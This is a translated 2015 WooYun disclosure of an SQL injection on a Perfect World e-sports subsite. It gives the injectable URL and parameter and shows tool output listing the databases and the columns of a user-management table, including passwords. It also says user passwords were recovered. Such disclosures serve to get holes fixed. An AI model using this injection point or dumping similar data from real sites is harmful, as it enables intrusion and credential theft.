
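Vulnerability summary

Bug ID: wooyun-2015-0136957

Title: SQL injection vulnerability on a subsite of the Perfect World e-sports platform (完美电竞平台)

Vendor: Perfect World (完美世界)

Author: 冷白开。

Submitted: 2015-08-26 13:19

Fixed: 2015-10-11 11:30

Published: 2015-10-11 11:30

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Confirmed by vendor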

Source: http://www.wooyun.org


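Vulnerability details

Disclosure status:

2015-08-26: Details reported to the vendor, awaiting vendor handling
2015-08-27: Vendor confirmed; details disclosed to the vendor only
2015-09-06: Details disclosed to core white hats and experts in related fields
2015-09-16: Details disclosed to regular white hats
2015-09-26: Details disclosed to intern white hats
2015-10-11: Details disclosed to the public

Brief description:

One SQL injection vulnerability in the Perfect World e-sports platform

Detailed description:

Injection point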

http://games.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=879

1.png

A small amount of data was dumped to prove the issue exists:

available databases [2]:
[*] information_schema
[*] wmp_main
Database: wmp_main
[101 tables]
Database: wmp_main
Table: tb_web_user_manage
[9 columns]
+--------------------+------------------+
| Column | Type |
+--------------------+------------------+
| f_create_time | datetime |
| f_last_modify_time | timestamp |
| f_nick_name | varchar(100) |
| f_parent_user_id | int(11) |
| f_status | smallint(6) |
| f_user_id | int(11) unsigned |
| f_user_level | varchar(50) |
| f_user_name | varchar(100) |
| f_user_password | varchar(100) |
+--------------------+------------------+
Database: wmp_main
Table: tb_web_user_manage
[11 entries]

The following passwords were recovered:

2.png

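Have fun with it. I've had a bit to drink and feel dizzy, so I won't dig any deeper; over to you.

Proof of vulnerability:

See above

Fix:

You know what to do

Copyright notice: when reposting, please credit the source 冷白开。@乌云 (WooYun)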


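Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-08-27 11:28

Vendor reply:

Thanks to the reporter for the attention to Perfect World; we will patch this as soon as possible.

Latest status:

None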